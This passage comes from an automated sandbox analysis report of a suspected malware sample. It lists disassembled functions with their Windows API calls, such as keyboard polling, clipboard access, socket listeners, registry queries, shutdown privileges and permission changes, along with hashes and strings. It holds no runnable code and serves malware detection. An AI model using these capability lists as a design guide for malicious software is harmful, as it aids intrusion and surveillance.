                              • SetCurrentDirectoryW.KERNEL32(0093A5A0), ref: 008EF46E
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF478
                              • FindClose.KERNEL32(00000000), ref: 008EF485
                              • FindClose.KERNEL32(00000000), ref: 008EF497
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                              • String ID: *.*
                              • API String ID: 1824444939-438819550
                              • Opcode ID: 9f51499a0341645785805ac4aca2c7593725b71bc94460f653ddc8477ae57a10
                              • Instruction ID: e0a710e4c2f9acfd2dc897598e3179e14166cd628844f5067034d050b53d2d61
                              • Opcode Fuzzy Hash: 9f51499a0341645785805ac4aca2c7593725b71bc94460f653ddc8477ae57a10
                              • Instruction Fuzzy Hash: D331E4725002596FDB20AB69EC98ADE73ACEF4A368F100175F950E21E2D730DA44CB54
                              Function 008D81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                • Part of subcall function 008D874A: GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                • Part of subcall function 008D874A: GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                • Part of subcall function 008D874A: HeapAlloc.KERNEL32(00000000,?,008D822A,?,?,?), ref: 008D8786
                                • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                • Part of subcall function 008D87E7: GetProcessHeap.KERNEL32(00000008,008D8240,00000000,00000000,?,008D8240,?), ref: 008D87F3
                                • Part of subcall function 008D87E7: HeapAlloc.KERNEL32(00000000,?,008D8240,?), ref: 008D87FA
                                • Part of subcall function 008D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D8240,?), ref: 008D880B
                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D825B
                              • _memset.LIBCMT ref: 008D8270
                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D828F
                              • GetLengthSid.ADVAPI32(?), ref: 008D82A0
                              • GetAce.ADVAPI32(?,00000000,?), ref: 008D82DD
                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D82F9
                              • GetLengthSid.ADVAPI32(?), ref: 008D8316
                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D8325
                              • HeapAlloc.KERNEL32(00000000), ref: 008D832C
                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D834D
                              • CopySid.ADVAPI32(00000000), ref: 008D8354
                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D8385
                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D83AB
                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D83BF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                              • String ID:
                              • API String ID: 3996160137-0
                              • Opcode ID: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                              • Instruction ID: 6ecce5e3f2ffa4801e11e2d34a7f0feac3ffd49aa413f8db672e8b0c50cb6ee7
                              • Opcode Fuzzy Hash: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                              • Instruction Fuzzy Hash: 3D615671904209EFDF14DFA4DC94AAEBBB9FF04B00F04822AE815E6391DB319A15DB60
                              Function 00896843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                              • API String ID: 0-4052911093
                              • Opcode ID: 060c4d8b011cf725ed310c5987e8d2a3618d8e53f6f84d9e2c997f5d71181a91
                              • Instruction ID: bc71180da7f2b1d62bfcd1d9cbfd02470ea2e11bac71063307b2e61e993c1a5d
                              • Opcode Fuzzy Hash: 060c4d8b011cf725ed310c5987e8d2a3618d8e53f6f84d9e2c997f5d71181a91
                              • Instruction Fuzzy Hash: 77726D71E00219DBDF24DF58C8947AEB7B5FF48314F18816AE859EB394EB309981CB90
                              Function 008B418A Relevance: 18.3, APIs: 12, Instructions: 273timeCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __lock.LIBCMT ref: 008B41AF
                                • Part of subcall function 008A9E4B: __mtinitlocknum.LIBCMT ref: 008A9E5D
                                • Part of subcall function 008A9E4B: EnterCriticalSection.KERNEL32(00000000,?,008A9CBC,0000000D), ref: 008A9E76
                              • ____lc_codepage_func.LIBCMT ref: 008B41F6
                              • __getenv_helper_nolock.LIBCMT ref: 008B4217
                              • _free.LIBCMT ref: 008B424A
                                • Part of subcall function 008A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9C64), ref: 008A2FA9
                                • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                              • _strlen.LIBCMT ref: 008B4251
                              • __malloc_crt.LIBCMT ref: 008B4258
                              • _strlen.LIBCMT ref: 008B4276
                              • __invoke_watson.LIBCMT ref: 008B4299
                              • _free.LIBCMT ref: 008B42A8
                              • GetTimeZoneInformation.KERNEL32(00944AF8,00000000,00000000,00000000,00000000,00000000,0093C070,00000030,008B3F3B,0093C050,00000008,008A70B8), ref: 008B42B9
                              • WideCharToMultiByte.KERNEL32(?,00000000,00944AFC,000000FF,?,0000003F,00000000,?), ref: 008B4332
                              • WideCharToMultiByte.KERNEL32(?,00000000,00944B50,000000FF,FFFFFFFE,0000003F,00000000,?), ref: 008B436B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide_free_strlen$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone____lc_codepage_func__getenv_helper_nolock__invoke_watson__lock__malloc_crt__mtinitlocknum
                              • String ID:
                              • API String ID: 2302051780-0
                              • Opcode ID: 804c222b30beccdee6a0f4d9170d6a89ce61b29a5656cabf4ec327a5cb5a4704
                              • Instruction ID: 5cb23b42232a6cae4c84e1fbe32a34350ee97d6c5c11ee8a1e6e586f7fa106ba
                              • Opcode Fuzzy Hash: 804c222b30beccdee6a0f4d9170d6a89ce61b29a5656cabf4ec327a5cb5a4704
                              • Instruction Fuzzy Hash: 12A18F709042099EDF159FA9D842BEDBBB8FF4A710F14106AF410E7392DB749D41DB26
                              Function 00900665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900737
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009007D6
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0090086E
                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00900AAD
                              • RegCloseKey.ADVAPI32(00000000), ref: 00900ABA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                              • String ID:
                              • API String ID: 1240663315-0
                              • Opcode ID: 736e41259a1aaa59cd0b0ab606662539f930d52d8c3fd1e007256a53371e0ef1
                              • Instruction ID: f1ba15ba4a41e4443e2a5e9b1113f78b6e3ca78f65e6a81934068bde0d55a3d5
                              • Opcode Fuzzy Hash: 736e41259a1aaa59cd0b0ab606662539f930d52d8c3fd1e007256a53371e0ef1
                              • Instruction Fuzzy Hash: D3E12E71204210AFCB14DF29C895E6ABBE9FF89714F04896DF499D72A2DB30ED05CB52
                              Function 008E0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 008E0241
                              • GetAsyncKeyState.USER32(000000A0), ref: 008E02C2
                              • GetKeyState.USER32(000000A0), ref: 008E02DD
                              • GetAsyncKeyState.USER32(000000A1), ref: 008E02F7
                              • GetKeyState.USER32(000000A1), ref: 008E030C
                              • GetAsyncKeyState.USER32(00000011), ref: 008E0324
                              • GetKeyState.USER32(00000011), ref: 008E0336
                              • GetAsyncKeyState.USER32(00000012), ref: 008E034E
                              • GetKeyState.USER32(00000012), ref: 008E0360
                              • GetAsyncKeyState.USER32(0000005B), ref: 008E0378
                              • GetKeyState.USER32(0000005B), ref: 008E038A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: 16a752a1844f4cfb7a893889078b4c6b2d7d3b73a2a40f74da74c83c7bb503f4
                              • Instruction ID: 03040ae3032a38d42f26c665fb19b94ef6e4b652406833fdde7159c4f5c3aaef
                              • Opcode Fuzzy Hash: 16a752a1844f4cfb7a893889078b4c6b2d7d3b73a2a40f74da74c83c7bb503f4
                              • Instruction Fuzzy Hash: 5D41BB245087C96EFF324A6598183B5BEE0FB13344F48489DD6C5C66C3D7D499C88FA1
                              Function 008F86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • CoInitialize.OLE32 ref: 008F8718
                              • CoUninitialize.OLE32 ref: 008F8723
                              • CoCreateInstance.OLE32(?,00000000,00000017,00912BEC,?), ref: 008F8783
                              • IIDFromString.OLE32(?,?), ref: 008F87F6
                              • VariantInit.OLEAUT32(?), ref: 008F8890
                              • VariantClear.OLEAUT32(?), ref: 008F88F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                              • API String ID: 834269672-1287834457
                              • Opcode ID: 3fd210a6fe8d9267675a73f6b0b464a62016cdcd508679fd8db99c33a5ac207b
                              • Instruction ID: 53a8c905cc3e83a3304c78eb13cd8bc410f0143e9816495f96412a47f680083c
                              • Opcode Fuzzy Hash: 3fd210a6fe8d9267675a73f6b0b464a62016cdcd508679fd8db99c33a5ac207b
                              • Instruction Fuzzy Hash: 75617830618305DFD710EF24C848B6ABBE8FF88754F144829FA85DB291CB60ED44CB92
                              Function 008F4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                              • String ID:
                              • API String ID: 1737998785-0
                              • Opcode ID: 74876212b9e3bea53b079f4fe660fcc5f0c4df91c478da92ad891a638c87fec4
                              • Instruction ID: b89c7669cfc068e88373e41286caf24293202f9d0bfeda4bf3b87476d8685817
                              • Opcode Fuzzy Hash: 74876212b9e3bea53b079f4fe660fcc5f0c4df91c478da92ad891a638c87fec4
                              • Instruction Fuzzy Hash: 5B21D3352152289FDB20AF68EC59F7A77A8FF04310F148016F946DB261DB71AD00DB85
                              Function 008E3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                • Part of subcall function 008E4CD3: GetFileAttributesW.KERNEL32(?,008E3947), ref: 008E4CD4
                              • FindFirstFileW.KERNEL32(?,?), ref: 008E3ADF
                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008E3B87
                              • MoveFileW.KERNEL32(?,?), ref: 008E3B9A
                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008E3BB7
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008E3BD9
                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008E3BF5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                              • String ID: \*.*
                              • API String ID: 4002782344-1173974218
                              • Opcode ID: 734536bc883139e16225393d1570532974096000bb6bcd91362befb488cb037c
                              • Instruction ID: 12b8ad53567dc19553f188e471a2c20783d1c7bb46543a3b689d75788f9896ed
                              • Opcode Fuzzy Hash: 734536bc883139e16225393d1570532974096000bb6bcd91362befb488cb037c
                              • Instruction Fuzzy Hash: 46518C318041999ACB15FBA5CE968EDB7B8FF55300F2441A9E442B7091EF30AF09CB62
                              Function 008EF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008EF6AB
                              • Sleep.KERNEL32(0000000A), ref: 008EF6DB
                              • _wcscmp.LIBCMT ref: 008EF6EF
                              • _wcscmp.LIBCMT ref: 008EF70A
                              • FindNextFileW.KERNEL32(?,?), ref: 008EF7A8
                              • FindClose.KERNEL32(00000000), ref: 008EF7BE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                              • String ID: *.*
                              • API String ID: 713712311-438819550
                              • Opcode ID: d6afb2422aa0a451246d6a53877332b1ad9de8760f611401bc92f209fa5f4b05
                              • Instruction ID: cf10448efb3e079526449cb997e4cf6ea894aa01f524b1ce5314a4f37b384da7
                              • Opcode Fuzzy Hash: d6afb2422aa0a451246d6a53877332b1ad9de8760f611401bc92f209fa5f4b05
                              • Instruction Fuzzy Hash: 2C41907190025AAFCF11EF65CC85AEEBBB4FF06310F144566E914E21A1EB309E44CF91
                              Function 00894140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                              • API String ID: 0-1546025612
                              • Opcode ID: 18ccd95921ea49dc9d6658f1763f6187ee1f5b20e138cdf97cf2dc537eb7ffd0
                              • Instruction ID: 6353fd4004a49c266cf5c6ce89cece58ec30df9a8dbaf5cca02dddd68a68ffc9
                              • Opcode Fuzzy Hash: 18ccd95921ea49dc9d6658f1763f6187ee1f5b20e138cdf97cf2dc537eb7ffd0
                              • Instruction Fuzzy Hash: 9BA26C70A0421ECBDF24DF58C990BADB7B1FB54314F2891AAD85AE7280D7349E86DF50
                              Function 008958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 9adc0099aaafb389ad99637d57f6623f47ed60afc4700712da253b961706e4b0
                              • Instruction ID: 3c6bb2b24976a4cfc95846c0c2880f1b3b3b261115abe78e2a23a86c2481fbcd
                              • Opcode Fuzzy Hash: 9adc0099aaafb389ad99637d57f6623f47ed60afc4700712da253b961706e4b0
                              • Instruction Fuzzy Hash: 7B129C70A00609EFDF14EFA8D985AAEB7F5FF48300F14462AE406E7291EB35AD11CB51
                              Function 008E545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                • Part of subcall function 008D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                • Part of subcall function 008D8CC3: GetLastError.KERNEL32 ref: 008D8D47
                              • ExitWindowsEx.USER32(?,00000000), ref: 008E549B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                              • String ID: $@$SeShutdownPrivilege
                              • API String ID: 2234035333-194228
                              • Opcode ID: a22b19db7ab0bbcafad9bd29bc8a1c10c6267730727cb5cce1115c8beb706ada
                              • Instruction ID: 56cb1578e5df8416e2cda65237d2f3acdd379b4d7035f371e9c8147061e4e638
                              • Opcode Fuzzy Hash: a22b19db7ab0bbcafad9bd29bc8a1c10c6267730727cb5cce1115c8beb706ada
                              • Instruction Fuzzy Hash: F70147B1669A496EF738627ADC5ABBA7258FB0274EF200131FC06D20C3DA504C808299
                              Function 008F6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                              Download Yara Rule
                              APIs
                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008F65EF
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F65FE
                              • bind.WSOCK32(00000000,?,00000010), ref: 008F661A
                              • listen.WSOCK32(00000000,00000005), ref: 008F6629
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6643
                              • closesocket.WSOCK32(00000000,00000000), ref: 008F6657
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLast$bindclosesocketlistensocket
                              • String ID:
                              • API String ID: 1279440585-0
                              • Opcode ID: 7e66cc691d148d46ec8120397635a1f7522af823076ba2796deff5b6ca1cf172
                              • Instruction ID: 666ef59afa52ee669cd77615881adc9146e0a5339c170b1967188963dccbc568
                              • Opcode Fuzzy Hash: 7e66cc691d148d46ec8120397635a1f7522af823076ba2796deff5b6ca1cf172
                              • Instruction Fuzzy Hash: B7219C312002189FCB10EF68CC95B7EB7A9FF48720F148269EA56E73D1DB74AD119B52
                              Function 00895680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                              • _memmove.LIBCMT ref: 008D062F
                              • _memmove.LIBCMT ref: 008D0744
                              • _memmove.LIBCMT ref: 008D07EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
